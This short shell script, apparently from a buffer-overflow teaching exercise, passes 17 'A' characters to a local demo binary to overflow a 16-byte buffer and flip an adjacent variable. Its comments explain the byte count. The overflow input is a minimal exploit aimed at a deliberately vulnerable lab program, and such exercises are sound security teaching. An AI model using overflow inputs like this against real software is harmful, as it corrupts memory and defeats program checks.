# Creative Commons Attribution-ShareAlike 3.0 License -
# This work is licensed under the Creative Commons Attribution-Share Alike
# 3.0 License. To view a copy of this license,
# visit http://creativecommons.org/licenses/by-sa/3.0/legalcode;
# or, (b) send a letter to Creative Commons, 171 2nd Street, Suite 300, San
# Francisco, California, 94105, USA.
#
# Originally created : Mataru
#
# We just need 16 + 1 to fill the buffer "buf" and set res none zero.o
./bof_side_effect $(python2 -c 'print "A" * 17')
# ./bof $(perl -e 'print "A" * 17')
